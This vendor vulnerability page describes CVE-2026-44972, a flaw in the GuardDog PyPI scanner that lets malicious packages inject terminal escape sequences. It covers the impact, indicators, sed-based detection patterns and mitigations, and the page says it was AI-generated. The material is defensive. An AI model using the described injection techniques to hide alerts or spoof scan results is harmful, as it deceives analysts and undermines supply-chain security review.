Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2026-44972

CVE-2026-44972: GuardDog CLI Terminal Injection Vulnerability

CVE-2026-44972 is a terminal injection flaw in GuardDog CLI tool (versions 2.6.0-2.9.0) that allows malicious PyPI packages to inject ANSI escape sequences into analyst terminals. This article covers technical details, impact, and fixes.

Published:

CVE-2026-44972 Overview

CVE-2026-44972 affects GuardDog, a command-line tool from DataDog used to identify malicious PyPI packages. Versions 2.6.0 through 2.9.0 include attacker-controlled filenames, file locations, messages, and code snippets in the default human-readable output. GuardDog does not escape terminal control characters before printing this data. A malicious package can inject American National Standards Institute (ANSI) or Operating System Command (OSC) escape sequences into analyst terminals or continuous integration (CI) logs. The flaw maps to [CWE-116: Improper Encoding or Escaping of Output].

Critical Impact

Malicious PyPI packages can manipulate terminal output, hide indicators of compromise, or spoof scan results in CI/CD pipelines analyzing untrusted code.

Affected Products

  • DataDog GuardDog 2.6.0
  • DataDog GuardDog versions 2.6.x through 2.8.x
  • DataDog GuardDog 2.9.0

Discovery Timeline

  • 2026-05-27 - CVE-2026-44972 published to NVD
  • 2026-05-27 - Last updated in NVD database

Technical Details for CVE-2026-44972

Vulnerability Analysis

GuardDog scans PyPI packages and reports findings through a default human-readable formatter. The formatter writes attacker-influenced fields directly to standard output. These fields include filenames, file paths, heuristic messages, and source code snippets extracted from the analyzed package.

Because the output path performs no sanitization, any byte sequence present in the package propagates to the terminal. Modern terminals interpret ANSI Control Sequence Introducer (CSI) and OSC sequences embedded in this stream. An attacker who publishes a package can craft filenames or code that include these sequences.

The practical impact depends on the terminal in use. Attackers can overwrite previous lines to hide alerts, recolor output to mask high-severity findings, set window titles, or trigger clipboard manipulation through OSC 52. In CI logs, injected sequences can break log parsers or render misleading evidence to reviewers.

Root Cause

The default output renderer concatenates untrusted strings into terminal output without filtering C0 control codes or escape sequences. GuardDog treats scan findings as trusted display data rather than as untrusted input that requires encoding before rendering.

Attack Vector

Exploitation requires an analyst or CI job to scan a malicious package with GuardDog 2.6.0 through 2.9.0 using the default output format. The attacker controls the package contents on PyPI or any source GuardDog ingests. When GuardDog prints findings, the embedded escape sequences execute against the consuming terminal. User interaction is required because a human or pipeline must invoke the scan.

The vulnerability is described in prose only because no public exploit code is referenced. See the GitHub Security Advisory GHSA-m5p4-gvpx-4mvr for vendor technical details.

Detection Methods for CVE-2026-44972

Indicators of Compromise

  • Presence of raw \\x1b[ (ESC CSI) or \\x1b] (ESC OSC) byte sequences in GuardDog scan output or stored CI logs.
  • PyPI package artifacts containing filenames with non-printable control characters or embedded escape codes.
  • Unexpected terminal behavior during scans, including cleared screens, altered colors, or modified window titles.

Detection Strategies

  • Pipe GuardDog output through a filter such as cat -v or sed 's/\\x1b\[[0-9;]*[a-zA-Z]//g' to reveal hidden control sequences.
  • Scan stored CI log artifacts for ANSI escape patterns originating from package metadata fields.
  • Inventory installed GuardDog versions across developer workstations and CI runners to identify 2.6.0 through 2.9.0 deployments.

Monitoring Recommendations

  • Monitor CI pipeline logs for control-character byte sequences in third-party scan tool output.
  • Alert on GuardDog invocations against untrusted packages from non-pinned sources.
  • Track GuardDog version drift in build images and developer tooling baselines.

How to Mitigate CVE-2026-44972

Immediate Actions Required

  • Upgrade GuardDog to a version later than 2.9.0 that contains the output-encoding fix per the vendor advisory.
  • Run GuardDog in non-interactive mode using machine-readable formats such as JSON or SARIF when scanning untrusted packages.
  • Review historical CI logs for injected escape sequences that may have hidden prior findings.

Patch Information

DataDog addresses the issue in GuardDog releases after 2.9.0. Refer to the GitHub Security Advisory GHSA-m5p4-gvpx-4mvr for the fixed version and the corresponding commit.

Workarounds

  • Use the JSON output mode (--output-format json) and parse results programmatically rather than reading raw terminal output.
  • Strip ANSI and OSC escape sequences from GuardDog output before display when running an unpatched version.
  • Restrict GuardDog scans of untrusted packages to ephemeral sandboxes that do not share terminal sessions with analysts.
bash
# Configuration example
# Run GuardDog with JSON output to avoid terminal rendering of attacker-controlled fields
guarddog pypi scan <package> --output-format json > scan-results.json

# When raw output must be reviewed, strip escape sequences first
guarddog pypi scan <package> | sed -E 's/\\x1b\[[0-9;]*[A-Za-z]//g; s/\\x1b\][^\\x07]*\\x07//g'

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne